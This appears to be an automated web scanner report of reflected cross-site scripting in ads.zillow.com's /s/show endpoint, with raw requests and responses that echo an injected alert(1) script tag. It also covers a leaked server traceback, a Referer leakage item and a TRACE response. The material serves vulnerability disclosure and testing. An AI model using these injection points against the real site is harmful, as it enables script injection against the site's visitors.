1. Cross-site scripting (reflected)
1.2. http://ads.zillow.com/s/show [name of an arbitrarily supplied request parameter]
2. Cross-domain Referer leakage
Severity: | High |
Confidence: | Certain |
Host: | http://ads.zillow.com |
Path: | /s/show |
GET /s/show?%27--%3E%3C/style Host: ads.zillow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bchk=1; zguid=3|9737b7e6-bd95 |
HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 23:27:36 GMT Server: Apache/2.2.9 (Debian) Cache-Control: max-age=0, no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 969 <html><head></head><body style="width:300px;height ...[SNIP]... </script>7e7a9<script>alert(1)< </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.zillow.com |
Path: | /s/show |
GET /s/show?format=HTML&prid Host: ads.zillow.com Proxy-Connection: keep-alive Referer: http://www.zillow.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bchk=1; zguid=3|9737b7e6-bd95 |
HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 23:01:02 GMT Server: Apache/2.2.9 (Debian) Cache-Control: max-age=0, no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 916 <html><head></head><body style="width:300px;height ...[SNIP]... params) File "/opt/zillow/services raise Exception ("unknown parameter (%s)" % k) Exception: unknown parameter (f3b2d<script>alert(1)< </div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.zillow.com |
Path: | /s/show |
GET /s/show?format=HTML&prid Host: ads.zillow.com Proxy-Connection: keep-alive Referer: http://www.zillow.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bchk=1; zguid=3|9737b7e6-bd95 |
HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 23:00:08 GMT Server: Apache/2.2.9 (Debian) Cache-Control: max-age=0, no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 3511 <html> <head> <title>Advertisement< <style type="text/css" media="screen, projection"> html{border:0;margin:0 ...[SNIP]... <div class="image"><img style="height:76;width ...[SNIP]... <div class="image"><img style="height:76;width ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.zillow.com |
Path: | / |
TRACE / HTTP/1.0 Host: ads.zillow.com Cookie: 5622eafb03a9301f |
HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 23:00:09 GMT Server: Apache/2.2.9 (Debian) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: ads.zillow.com Cookie: 5622eafb03a9301f |